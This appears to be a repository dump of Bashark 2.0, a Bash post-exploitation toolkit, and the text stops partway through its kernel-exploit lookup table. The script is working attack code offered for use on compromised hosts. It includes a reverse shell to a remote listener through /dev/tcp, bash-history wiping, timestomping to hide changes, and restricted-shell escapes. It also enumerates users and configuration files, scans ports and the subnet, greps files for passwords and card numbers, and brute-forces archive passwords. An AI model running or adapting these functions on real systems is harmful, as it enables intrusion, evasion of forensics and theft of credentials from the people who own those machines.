├── README.md ├── LICENSE └── bashark.sh /README.md: -------------------------------------------------------------------------------- 1 |

Bashark 2.0


2 |

3 | 4 | Bashark 5 | 6 |

7 | 8 |

9 | Post exploitation toolkit 10 |

11 | 12 | ![Language](https://img.shields.io/badge/Language-Bash-blue.svg?longCache=true&style=flat-square) ![License](https://img.shields.io/badge/License-MIT-red.svg?longCache=true&style=flat-square) ![Version](https://img.shields.io/badge/Version-2.0-green.svg?longCache=true&style=flat-square) 13 | 14 | Bashark aids pentesters and security researchers during the post-exploitation phase of security audit. 15 | 16 | ## Usage 17 | To launch this tool on compromised host, simply source the `bashark.sh` script from terminal: 18 | 19 | `$ source bashark.sh` 20 | 21 | Then type `help` to see the help menu 22 | 23 | ## License 24 | This software is under [MIT License](https://en.wikipedia.org/wiki/MIT_License) 25 | 26 | 27 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 redcodelabs.io 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /bashark.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | version="2.0" 3 | 4 | red=`tput setaf 1` 5 | green=`tput setaf 2` 6 | yellow=`tput setaf 3` 7 | blue=`tput setaf 4` 8 | magenta=`tput setaf 5` 9 | grey=`tput setaf 8` 10 | reset=`tput sgr0` 11 | bold=`tput bold` 12 | underline=`tput smul` 13 | 14 | 15 | echo ' 16 | __________ .__ __ ________ _______ 17 | \______ \_____ _____| |__ _____ _______| | __ ___ __ \_____ \ \ _ \ 18 | | | _/\__ \ / ___/ | \\__ \\_ __ \ |/ / \ \/ / / ____/ / /_\ \ 19 | | | \ / __ \_\___ \| Y \/ __ \| | \/ < \ / / \ \ \_/ \ 20 | |______ /(____ /____ >___| (____ /__| |__|_ \ \_/ /\ \_______ \ /\ \_____ / 21 | \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ 22 | 23 | ' 24 | printf "\n" 25 | echo "[*] Type 'help' to show available commands" 26 | printf "\n" 27 | 28 | files_to_delete=() 29 | dirs_to_delete=() 30 | cleanup="on" 31 | active_hosts=() 32 | 33 | print_good(){ 34 | echo "${green}[+]${reset}" $1 35 | } 36 | print_error(){ 37 | echo "${red}[x]${reset}" $1 38 | } 39 | print_info(){ 40 | echo "[*]" $1 41 | } 42 | print_question(){ 43 | echo "[?]" $1 44 | } 45 | command_error_exit(){ 46 | echo "${red}${bold}[LAST CMD ERROR:$?]${reset}" 47 | } 48 | 49 | root_check(){ 50 | if [[ $UID -ne 0 ]] 51 | then 52 | print_error 'You need to be root to run this command' 53 | echo 54 | exit 1 55 | fi 56 | } 57 | 58 | PS1="${bold}bashark_$version${reset}$ " 59 | export PS1 60 | 61 | if [ "$(uname)" == "Darwin" ]; then 62 | platform="osx" 63 | elif [ "$(uname)" == "Linux" ]; then 64 | platform="linux" 65 | fi 66 | 67 | 68 | #################COMMANDS################### 69 | usrs(){ 70 | if [[ "$@" =~ .*-h.* ]]; then 71 | echo " 72 | ${underline}USAGE:${reset} 73 | usrs [-h] 74 | ${underline}DESCRIPTION:${reset} 75 | Enumerate all local users and highlight currently logged-in" 76 | else 77 | current_user=`whoami` 78 | all_users=`cut -d: -f1 /etc/passwd` 79 | print_info "List of users:" 80 | echo "${all_users//$current_user/${green}${bold}*$current_user${reset}}" 81 | fi 82 | } 83 | 84 | getapp(){ 85 | if [[ "$@" =~ .*-h.* ]]; then 86 | echo " 87 | ${underline}USAGE:${reset} 88 | getapp [-h] [FILTER] 89 | ${underline}OPTIONAL ARGUMENTS:${reset} 90 | FILTER Show installed apps that match the filter (ex. getapp sql) 91 | ${underline}DESCRIPTION:${reset} 92 | Enumerate all installed applications" 93 | else 94 | IFS=: read -ra dirs_in_path <<< "$PATH" 95 | for dir in "${dirs_in_path[@]}"; do 96 | for file in "$dir"/*; do 97 | if [ $# -eq 0 ]; then 98 | [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" 99 | else 100 | filter=$1 101 | if [[ $file =~ $filter ]]; then 102 | [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" 103 | fi 104 | fi 105 | done 106 | done 107 | fi 108 | } 109 | 110 | revshell(){ 111 | arguments_errors=0 112 | if [[ "$@" =~ .*-h.* ]]; then 113 | echo " 114 | ${underline}USAGE:${reset} 115 | revshell [-h] HOST PORT 116 | ${underline}POSITIONAL ARGUMENTS:${reset} 117 | HOST Address of the listening host 118 | PORT Port to connect with 119 | ${underline}DESCRIPTION:${reset} 120 | Send a reverse shell to remote host" 121 | else 122 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 123 | host=$1 124 | else 125 | print_error "Wrong IP address format" 126 | ((arguments_errors++)) 127 | fi 128 | if [ "$2" -eq "$2" ] 2>/dev/null; then 129 | port=$2 130 | else 131 | print_error "Wrong port format: integer required" 132 | ((arguments_errors++)) 133 | fi 134 | if [ $arguments_errors = 0 ]; then 135 | print_good "Started reversed shell (${host}:${port})" 136 | revshell_cmd="bash -i >& /dev/tcp/${host}/${port} 0>&1" 137 | eval "$revshell_cmd" 138 | fi 139 | fi 140 | 141 | } 142 | 143 | quit(){ 144 | if [[ "$@" =~ .*-h.* ]]; then 145 | echo " 146 | ${underline}USAGE:${reset} 147 | quit [-h] 148 | ${underline}DESCRIPTION:${reset} 149 | Exit Bashark, clean history and execute cleanup routine" 150 | else 151 | print_info "Starting cleanup routine" 152 | fls=$(echo $files_to_delete | tr ":" "\n") 153 | drs=$(echo $dirs_to_delete | tr ":" "\n") 154 | print_info "Removing bash history" 155 | cat /dev/null > ~/.bash_history && history -c 156 | print_info "Started file cleanup routine" 157 | removed_files=0 158 | removed_dirs=0 159 | for file in ${fls[*]}; do 160 | rm $file 161 | ((removed_files++)) 162 | done 163 | for dir in ${drs[*]}; do 164 | rmdir $dir 165 | ((removed_dirs++)) 166 | done 167 | print_info "Removed ${bold}${removed_files}${reset} files" 168 | print_info "Removed ${bold}${removed_dirs}${reset} directories" 169 | fi 170 | } 171 | 172 | timestomp(){ 173 | if [[ "$@" =~ .*-h.* ]]; then 174 | echo " 175 | ${underline}USAGE:${reset} 176 | timestomp DATE FILE 177 | ${underline}POSITIONAL ARGUMENTS:${reset} 178 | DATE Set the date to spoof (ex. 20170322) 179 | FILE File to timestomp 180 | ${underline}DESCRIPTION:${reset} 181 | Change attributes of a file (access, modify, change)." 182 | else 183 | if [ $# -eq 0 ]; then 184 | print_error "Specify DATE and FILE" 185 | elif [ $# -eq 1 ]; then 186 | print_error "Specify FILE" 187 | else 188 | date=$1 189 | file_to_modify=$2 190 | filename=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1) 191 | touch -d $date $filename 192 | touch -r $filename $file_to_modify 193 | rm $filename 194 | print_good "Succesfully timestomped ${file_to_modify}" 195 | fi 196 | fi 197 | } 198 | 199 | portscan(){ 200 | opened_ports=0 201 | if [[ "$@" =~ .*-h.* ]]; then 202 | echo " 203 | ${underline}USAGE:${reset} 204 | portscan [-h] HOST 205 | ${underline}POSITIONAL ARGUMENTS:${reset} 206 | HOST Host to scan 207 | ${underline}DESCRIPTION:${reset} 208 | Simple portscanner that shows if most popular ports are opened" 209 | else 210 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 211 | host=$1 212 | if [[ `ping -c 2 ${host}` =~ .*Unreachable.* ]]; then 213 | print_error "Host (${host}) is unreachable" 214 | else 215 | ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 216 | 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 217 | 458 546 547 563 569 1080) 218 | for port in ${ports[*]}; do 219 | (echo >/dev/tcp/$host/$port) &>/dev/null 220 | if [ $? -eq 0 ]; then 221 | print_good "$host:$port is ${green}opened${reset}" 222 | ((opened_ports++)) 223 | fi 224 | done 225 | fi 226 | if [ $opened_ports = 0 ]; then 227 | print_error "No ports opened" 228 | fi 229 | else 230 | print_error "Wrong IP address format" 231 | fi 232 | fi 233 | } 234 | 235 | 236 | i(){ 237 | if [[ "$@" =~ .*-h.* ]]; then 238 | echo " 239 | ${underline}USAGE:${reset} 240 | i [-h] 241 | ${underline}DESCRIPTION:${reset} 242 | Show information about compromised host" 243 | else 244 | star="${bold}${grey}<${reset}${magenta}${bold}*${reset}${bold}${grey}>${reset}" 245 | root_usrs=`grep 'x:0:' /etc/passwd` 246 | 247 | OS=`uname -s` 248 | REV=`uname -r` 249 | MACH=`uname -m` 250 | 251 | GetVersionFromFile() 252 | { 253 | VERSION=`cat $1 | tr "\n" ' ' | sed s/.*VERSION.*=\ // ` 254 | } 255 | 256 | if [ "${OS}" = "SunOS" ] ; then 257 | OS=Solaris 258 | ARCH=`uname -p` 259 | OSSTR="${OS} ${REV}(${ARCH} `uname -v`)" 260 | elif [ "${OS}" = "AIX" ] ; then 261 | OSSTR="${OS} `oslevel` (`oslevel -r`)" 262 | elif [ "${OS}" = "Linux" ] ; then 263 | KERNEL=`uname -r` 264 | if [ -f /etc/redhat-release ] ; then 265 | DIST='RedHat' 266 | PSUEDONAME=`cat /etc/redhat-release | sed s/.*\(// | sed s/\)//` 267 | REV=`cat /etc/redhat-release | sed s/.*release\ // | sed s/\ .*//` 268 | elif [ -f /etc/SuSE-release ] ; then 269 | DIST=`cat /etc/SuSE-release | tr "\n" ' '| sed s/VERSION.*//` 270 | REV=`cat /etc/SuSE-release | tr "\n" ' ' | sed s/.*=\ //` 271 | elif [ -f /etc/mandrake-release ] ; then 272 | DIST='Mandrake' 273 | PSUEDONAME=`cat /etc/mandrake-release | sed s/.*\(// | sed s/\)//` 274 | REV=`cat /etc/mandrake-release | sed s/.*release\ // | sed s/\ .*//` 275 | elif [ -f /etc/debian_version ] ; then 276 | DIST="Debian `cat /etc/debian_version`" 277 | REV="" 278 | 279 | fi 280 | if [ -f /etc/UnitedLinux-release ] ; then 281 | DIST="${DIST}[`cat /etc/UnitedLinux-release | tr "\n" ' ' | sed s/VERSION.*//`]" 282 | fi 283 | 284 | OSSTR="${OS} ${DIST} ${REV}(${PSUEDONAME} ${KERNEL} ${MACH})" 285 | 286 | fi 287 | 288 | os=${OSSTR} 289 | super_users=`grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'` 290 | if [[ "$root_usrs" =~ "$(whoami)" ]]; then 291 | is_root="(${green}Root privilleges${reset})" 292 | else 293 | is_root="(${red}No root privilleges${reset})" 294 | fi 295 | local_ip=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` 296 | global_ip=`wget http://ipecho.net/plain -O - -q ; echo` 297 | if [ `cat /proc/sys/kernel/randomize_va_space` = "2" ]; then 298 | aslr="${red}Enabled${reset} (data segment randomization)" 299 | elif [ `cat /proc/sys/kernel/randomize_va_space` = "1" ]; then 300 | aslr="${yellow}Enabled${reset}" 301 | else 302 | aslr="${green}Disabled${reset}" 303 | fi 304 | if [ `cat /proc/sys/kernel/dmesg_restrict` = "1" ]; then 305 | dmesg_restrict="${red}Enabled${reset} (data segment randomization)" 306 | elif [ `cat /proc/sys/kernel/dmesg_restrict` = "0" ]; then 307 | dmesg_restrict="${green}Disabled${reset}" 308 | fi 309 | if [ `cat /proc/sys/kernel/perf_event_paranoid` = "-1" ]; then 310 | perf_paranoid="${green}Disabled${reset}" 311 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "0" ]; then 312 | perf_paranoid="${yellow}Enabled${reset} (restricted raw tracepoint access)" 313 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "1" ]; then 314 | perf_paranoid="${red}Enabled${reset} (restricted CPU events access)" 315 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "2" ]; then 316 | perf_paranoid="${red}Enabled${reset} (restricted kernel profiling)" 317 | fi 318 | 319 | host="127.0.0.1" 320 | opened_ports=() 321 | ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 322 | 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 323 | 458 546 547 563 569 1080 5432 4444 5555) 324 | for port in ${ports[*]}; do 325 | (echo >/dev/tcp/$host/$port) &>/dev/null 326 | if [ $? -eq 0 ]; then 327 | opened_ports+=$port, 328 | fi 329 | done 330 | if [ ${#opened_ports} = 0 ]; then 331 | opened_ports="${red}None${reset}" 332 | fi 333 | echo " 334 | ${star}Username : ${bold}$(whoami)${reset} ${is_root} 335 | ${star}User Groups : $(groups $(whoami)) 336 | ${star}Super users : ${super_users} 337 | ${star}Hostname : $(hostname) 338 | ${star}OS : $os 339 | ${star}Kernel : $(uname -r) 340 | ${star}Arch : $(uname -m) 341 | ${star}Local IP : ${local_ip} 342 | ${star}Global IP : ${global_ip} 343 | ${star}RAM 344 | $(cat /proc/meminfo |grep MemTotal) 345 | $(cat /proc/meminfo |grep MemFree) 346 | $(cat /proc/meminfo |grep SwapTotal) 347 | ${star}Opened Ports : ${green}${opened_ports}${reset} 348 | ${star}Kernel configuration: 349 | * ASLR : ${aslr} 350 | * DMESG_RESTRICT: ${dmesg_restrict} 351 | * PERF_PARANOID : ${perf_paranoid} 352 | " 353 | fi 354 | } 355 | 356 | c(){ 357 | if [[ "$@" =~ .*-h.* ]]; then 358 | echo " 359 | ${underline}USAGE:${reset} 360 | c [-h] 361 | ${underline}DESCRIPTION:${reset} 362 | Clear screen" 363 | else 364 | clear 365 | fi 366 | } 367 | 368 | _(){ 369 | if [[ "$@" =~ .*-h.* ]]; then 370 | echo " 371 | ${underline}USAGE:${reset} 372 | _ [-h] 373 | ${underline}DESCRIPTION:${reset} 374 | Go back to previous directory (alias of 'cd ..')" 375 | else 376 | cd .. 377 | fi 378 | } 379 | 380 | getconf(){ 381 | not_found=0 382 | if [[ "$@" =~ .*-h.* ]]; then 383 | echo " 384 | ${underline}USAGE:${reset} 385 | getconf [-h] [-v] 386 | ${underline}OPTIONAL ARGUMENTS:${reset} 387 | -v Show contents of config files (verbose mode) 388 | ${underline}DESCRIPTION:${reset} 389 | Enumerate and show configuration files" 390 | else 391 | confiles=("/etc/master.passwd" "/etc/group" "/etc/hosts" "/etc/crontab" 392 | "/etc/sysctl.conf" "/etc/ssh/ssh_config" 393 | "/etc/ssh/sshd_config" "/etc/resolv.conf" "/etc/syslog.conf" "/etc/chttp.conf" 394 | "/etc/lighttpd.conf" "/etc/cups/cupsd.confcda" "/etc/inetd.conf" "/opt/lampp/etc/httpd.conf" 395 | "/etc/samba/smb.conf" "/etc/openldap/ldap.conf" "/etc/ldap/ldap.conf" "/etc/exports" "/etc/auto.master" 396 | "/etc/auto_master" "/etc/fstab" "/etc/cpufreq-bench.conf" "/etc/dhcpcd.conf" "/etc/dnsmasq.conf" "/etc/fuse.conf" 397 | "/etc/gai.conf" "/etc/healthd.conf" "/etc/host.conf" "/etc/i3status.conf" 398 | "/etc/krb5.conf" "/etc/ld.so.conf" "/etc/libao.conf" "/etc/locale.conf" "/etc/logrotate.conf" 399 | "/etc/ltrace.conf" "/etc/makepkg.conf" "/etc/man_db.conf" "/etc/mdadm.conf" "/etc/mke2fs.conf" 400 | "/etc/mkinitcpio.conf" "/etc/modules.conf" "/etc/mpd.conf" "/etc/netconfig") 401 | 402 | for file in ${confiles[*]}; do 403 | if [ ! -f $file ]; then 404 | : 405 | else 406 | if [[ "$@" =~ .*-v.* ]]; then 407 | print_good "Found ${magenta}${file}${reset}:" 408 | cat $file 409 | printf "\n" 410 | else 411 | print_good "Found ${magenta}${file}${reset}" 412 | ((found++)) 413 | fi 414 | fi 415 | done 416 | if [[ $found = 0 ]]; then 417 | print_error "No configuration files found" 418 | fi 419 | fi 420 | } 421 | 422 | cleanup(){ 423 | if [[ "$@" =~ .*-h.* ]]; then 424 | echo " 425 | ${underline}USAGE:${reset} 426 | cleanup [-h] [on|off] 427 | ${underline}DESCRIPTION:${reset} 428 | When enabled, the cleanup routine deletes on exit every new file or folder created during Bashark session" 429 | else 430 | if [ $# -eq 0 ]; then 431 | if [[ $cleanup == "on" ]]; then 432 | print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" 433 | else 434 | print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" 435 | fi 436 | elif [ $1 == "on" ]; then 437 | cleanup="on" 438 | print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" 439 | elif [ $1 == "off" ]; then 440 | cleanup="off" 441 | print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" 442 | else 443 | print_error "No such option" 444 | fi 445 | fi 446 | } 447 | 448 | t(){ 449 | if [[ "$@" =~ .*-h.* ]]; then 450 | echo " 451 | ${underline}USAGE:${reset} 452 | t [-h] [TOUCH_COMMAND_ARGUMENTS] 453 | ${underline}DESCRIPTION:${reset} 454 | Alias of 'touch' command that respects current cleanup routine settings" 455 | else 456 | touch $1 $2 $3 $4 $5 $6 $7 $8 $9 457 | if [[ "$cleanup" == "on" ]]; then 458 | files_to_delete+=`readlink -f $1`: 459 | fi 460 | print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" 461 | fi 462 | } 463 | 464 | hosts(){ 465 | if [[ "$@" =~ .*-h.* ]]; then 466 | echo " 467 | ${underline}USAGE:${reset} 468 | hosts [-h] 469 | ${underline}DESCRIPTION:${reset} 470 | Enumerate active hosts in background" 471 | else 472 | for ip in $(seq 1 255); do 473 | ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && printf "\n192.168.1.$ip is ${green}${bold}active${reset}\r" || : ; done & 474 | fi 475 | } 476 | 477 | isvm(){ 478 | if [[ "$@" =~ .*-h.* ]]; then 479 | echo " 480 | ${underline}USAGE:${reset} 481 | isvm [-h] 482 | ${underline}DESCRIPTION:${reset} 483 | Check if OS is running on virtual machine" 484 | else 485 | if ls -di --color=never /|grep -vqe "^2.*/$"; then 486 | print_info "Running in chroot" 487 | fi 488 | if grep -q "^flags.*hypervisor" /proc/cpuinfo; then 489 | print_info "Host is running on a Virtual Machine" 490 | else 491 | print_info "Host is not a Virtual Machine" 492 | fi 493 | fi 494 | } 495 | 496 | fnd(){ 497 | if [[ "$@" =~ .*-h.* ]]; then 498 | echo " 499 | ${underline}USAGE:${reset} 500 | fnd [-h] [-v] PATTERN 501 | ${underline}DESCRIPTION:${reset} 502 | Search for regex occurrence in current directory" 503 | else 504 | if [[ "$@" =~ .*-v.* ]]; then 505 | grep -rGnw '.' -e "${@: -1}" 506 | else 507 | grep -rGlw '.' -e "${@: -1}" 508 | fi 509 | fi 510 | 511 | } 512 | 513 | mkd(){ 514 | if [[ "$@" =~ .*-h.* ]]; then 515 | echo " 516 | ${underline}USAGE:${reset} 517 | mkd [-h] [ARGUMENTS] 518 | ${underline}DESCRIPTION:${reset} 519 | Alias of 'mkdir' command that respects current cleanup routine settings" 520 | else 521 | mkdir $1 $2 $3 $4 $5 $6 $7 $8 $9 522 | if [[ "$cleanup" == "on" ]]; then 523 | dirs_to_delete+=`readlink -f $1`: 524 | fi 525 | print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" 526 | fi 527 | } 528 | 529 | esc(){ 530 | if [[ "$@" =~ .*-h.* ]]; then 531 | echo " 532 | ${underline}USAGE:${reset} 533 | esc [-h] 534 | ${underline}DESCRIPTION:${reset} 535 | Spawn a non-restricted shell" 536 | else 537 | if hash awk 2>/dev/null; then 538 | awk 'BEGIN {system("/bin/sh")}' 539 | elif hash python 2>/dev/null; then 540 | python -c 'import pty; pty.spawn("/bin/sh")' 541 | elif hash ruby 2>/dev/null; then 542 | ruby -e 'exec "/bin/sh"' 543 | elif hash perl 2>/dev/null; then 544 | perl -e 'exec("sh -i");' 545 | else 546 | print_error "No interpreter found for shell escaping" 547 | fi 548 | fi 549 | } 550 | 551 | mex(){ 552 | if [[ "$@" =~ .*-h.* ]]; then 553 | echo " 554 | ${underline}USAGE:${reset} 555 | mx [-h] FILE 556 | ${underline}POSITIONAL ARGUMENTS:${reset} 557 | FILE File to add permissions 558 | ${underline}DESCRIPTION:${reset} 559 | Add executive permissions to a file" 560 | else 561 | if [ $# -eq 0 ]; then 562 | print_error "Specify the file" 563 | elif [ ! -f $1 ]; then 564 | print_error "File does not exist" 565 | else 566 | chmod a=x $1 567 | print_good "$1 is executable" 568 | fi 569 | fi 570 | } 571 | 572 | lg(){ 573 | if [[ "$@" =~ .*-h.* ]]; then 574 | echo " 575 | ${underline}USAGE:${reset} 576 | lg [-h] REGEX 577 | ${underline}POSITIONAL ARGUMENTS:${reset} 578 | REGEX Regular expression to search in listed files 579 | ${underline}DESCRIPTION:${reset} 580 | This command searches for occurrence of specified regular expression in filenames of the current directory 581 | Alias of 'ls|grep -E '" 582 | else 583 | if [ $# -eq 0 ]; then 584 | print_error "Specify the regular expression" 585 | else 586 | ls|grep -E $1 587 | fi 588 | fi 589 | } 590 | 591 | 592 | getperm(){ 593 | if [[ "$@" =~ .*-h.* ]]; then 594 | echo " 595 | ${underline}USAGE:${reset} 596 | getperm [-h] [-g] [-u] [-sb] [-c] [-wd] [-ed] [-wed] [-wf] [-nf] [DIRECTORY] 597 | ${underline}OPTIONAL ARGUMENTS:${reset} 598 | -g Search for SGID (chmod 2000) 599 | -u Search for SUID (chmod 4000) 600 | -sb Search for sticky bit 601 | -c Search for SGID and SUID in most common places (/bin, /sbin, /usr/bin, etc.) 602 | -wd Search for world-writeable directories 603 | -ed Search for world-executable directories 604 | -wed Search for both executable and writeable directories 605 | -wf Search for world-writeable files 606 | -nf Search for no-owner files 607 | [DIRECTORY] Directory to search instead of the current one 608 | ${underline}DESCRIPTION:${reset} 609 | Search for advanced linux file permissions in the current directory. You need to specify at least 610 | one optional argument." 611 | else 612 | if [ $# -eq 0 ]; then 613 | print_error "Specify at least one option" 614 | else 615 | dir="." 616 | if [[ "${@: -1}" =~ .*-.* ]]; then 617 | : 618 | else 619 | dir="${@: -1}" 620 | fi 621 | if [[ "$@" =~ .*-g.* ]]; then 622 | print_good "SGID files:" 623 | find ${dir} -perm -g=s -type f 2>/dev/null 624 | fi 625 | if [[ "$@" =~ .*-u.* ]]; then 626 | print_good "SUID files:" 627 | find ${dir} -perm -u=s -type f 2>/dev/null 628 | fi 629 | if [[ "$@" =~ .*-sb.* ]]; then 630 | print_good "Sticky bit files:" 631 | find ${dir} -perm -1000 -type d 2>/dev/null 632 | fi 633 | if [[ "$@" =~ .*-c.* ]]; then 634 | print_good "Results from common places:" 635 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 636 | fi 637 | if [[ "$@" =~ .*-wd.* ]]; then 638 | print_good "World-writeable directories:" 639 | find ${dir} -perm -222 -type d 2>/dev/null 640 | fi 641 | if [[ "$@" =~ .*-ed.* ]]; then 642 | print_good "World-executable directories:" 643 | find ${dir} -perm -o x -type d 2>/dev/null 644 | fi 645 | if [[ "$@" =~ .*-wed.* ]]; then 646 | print_good "World-executable and writeable directories:" 647 | find ${dir} \( -perm -o w -perm -o x \) -type d 2>/dev/null 648 | fi 649 | if [[ "$@" =~ .*-wf.* ]]; then 650 | print_good "World-writeable files:" 651 | find ${dir} -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 652 | fi 653 | if [[ "$@" =~ .*-nf.* ]]; then 654 | print_good "Files with no owner:" 655 | find ${dir} -xdev \( -nouser -o -nogroup \) -print 656 | fi 657 | fi 658 | fi 659 | } 660 | 661 | fileinfo(){ 662 | if [[ "$@" =~ .*-h.* ]]; then 663 | echo " 664 | ${underline}USAGE:${reset} 665 | fileinfo [-h] FILE 666 | ${underline}POSITIONAL ARGUMENTS:${reset} 667 | FILE File to inspect 668 | ${underline}DESCRIPTION:${reset} 669 | Get information about specified file" 670 | else 671 | if [ $# -eq 0 ]; then 672 | print_error "Specify the file to inspect" 673 | elif [ ! -f $1 ]; then 674 | print_error "No such file" 675 | else 676 | if [[ -x "$1" ]]; then 677 | executable="${green}yes${reset}" 678 | else 679 | executable="${red}no${reset}" 680 | fi 681 | echo " 682 | ${green}*${reset}NAME: $1 683 | ${green}*${reset}CREATION DATE: $(stat -c %y $1| sed 's/^\([0-9\-]*\).*/\1/') 684 | ${green}*${reset}SIZE: $(stat --printf="%s" $1) bytes 685 | ${green}*${reset}EXECUTABLE: ${executable} 686 | ${green}*${reset}ENCODING: $(file -bi $1) 687 | " 688 | fi 689 | fi 690 | } 691 | 692 | fndre(){ 693 | #TODO FINISH 694 | if [[ "$@" =~ .*-h.* ]]; then 695 | echo " 696 | ${underline}USAGE:${reset} 697 | fndre [-h] FILE 698 | ${underline}POSITIONAL ARGUMENTS:${reset} 699 | FILE File to inspect 700 | ${underline}DESCRIPTION:${reset} 701 | Search for most popular regexes in a file (gmail and ip addresses, plaintext passwords, credit cards etc.)" 702 | else 703 | if [ $# -eq 0 ]; then 704 | print_error "Specify the file to inspect" 705 | elif [ ! -f $1 ]; then 706 | print_error "No such file" 707 | else 708 | filename=$1 709 | declare -A regexes 710 | regexes[IP_addresses]="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$" 711 | regexes[MAC_addresses]="(?:[0-9a-fA-F]:?){12}" 712 | regexes[Gmail_addresses]="\s.*@gmail.com" 713 | regexes[Plaintext_passwords]="[Pp]assword\s*[:=-].*\s" 714 | regexes[Usernames]="[Uu]ser\s*[:=-].*\s" 715 | regexes[Mastercard_regex]="[51-55]\d{14}" 716 | regexes[Visa_regex]="4\d{15}|4\d{12}" 717 | regexes[Discover_regex]="6011\d{12}|65\d{14}" 718 | regexes[AmericanExpress_regex]="34\d{13}|37\d{13}" 719 | regexes[DinersClub_regex]="[300-305]/d{11}|36/d{12}|38/d{12}" 720 | regexes[JCB_regex]="35\d{14}|2131\d{11}|1800\d{11})" 721 | 722 | for key in ${!regexes[@]}; do 723 | #echo $regexes[$key] 724 | print_good "$key search results:" 725 | re=$regexes[$key] 726 | grep -oE "$re" $filename 727 | done 728 | fi 729 | fi 730 | } 731 | 732 | 733 | bruteforce(){ 734 | if [[ "$@" =~ .*-h.* ]]; then 735 | echo " 736 | ${underline}USAGE:${reset} 737 | bruteforce [-h] DICTIONARY FILE 738 | ${underline}POSITIONAL ARGUMENTS:${reset} 739 | FILE File to bruteforce 740 | DICTIONARY Dictionary to use 741 | ${underline}DESCRIPTION:${reset} 742 | Bruteforce a file with a password" 743 | else 744 | if [ $# -eq 0 ]; then 745 | print_error "Specify the dictionary" 746 | fi 747 | if [ $# -eq 1 ]; then 748 | print_error "Specify the file to bruteforce" 749 | elif [ ! -f $1 ]; then 750 | print_error "No such dictionary" 751 | elif [ ! -f $2 ]; then 752 | print_error "No such file" 753 | else 754 | dictionary=$1 755 | filename=$2 756 | cracked=0 757 | for word in $(cat $dictionary); do 758 | if [ ".zip" in $filename ]; then 759 | out=$(unzip -R $word $filename) 760 | if [ "inflating" in $out ]; then 761 | print_good "Found password: $green$bold$word$reset" 762 | (($cracked++)) 763 | break 764 | else 765 | : 766 | fi 767 | elif [ ".rar" in $filename ]; then 768 | out=$(rar x -p"$word" $filename 1>/dev/null 2>/dev/null) 769 | success=`echo $?` 770 | if [ "$success" = 0 ]; then 771 | print_good "Found password: $green$bold$word$reset" 772 | (($cracked++)) 773 | break 774 | else 775 | : 776 | fi 777 | fi 778 | done 779 | if [ $cracked = 0 ]; then 780 | print_error "Password not found. Try another dictionary" 781 | fi 782 | fi 783 | fi 784 | 785 | } 786 | 787 | cve(){ 788 | if [[ "$@" =~ .*-h.* ]]; then 789 | echo " 790 | ${underline}USAGE:${reset} 791 | cve [-h] 792 | ${underline}DESCRIPTION:${reset} 793 | Search for kernel exploits" 794 | else 795 | hits=0 796 | declare -A exploits 797 | exploits=( ["2.4.20|2.2.24|2.4.25|2.4.26|2.4.27"]="CVE-2004-0077" 798 | ["2.4.29"]="CVE-2004-1235" 799 | ["2.6.34|2.6.35|2.6.36"]="caps_to_root (https://github.com/SecWiki/linux-kernel-exploits/blob/master/2004/caps_to_root/15916.c)" 800 | ["2.6.5|2.6.7|2.6.8|2.6.9|2.6.10|2.6.11"]="CVE-2005-0736" 801 | ["2.6.13|2.6.14|2.6.15|2.6.16|2.6.17"]="CVE-2006-2451" 802 | ["2.6.8|2.6.10|2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16"]="CVE-2006-3626" 803 | ["2.6.23|2.6.24"]="CVE-2008-0600" 804 | 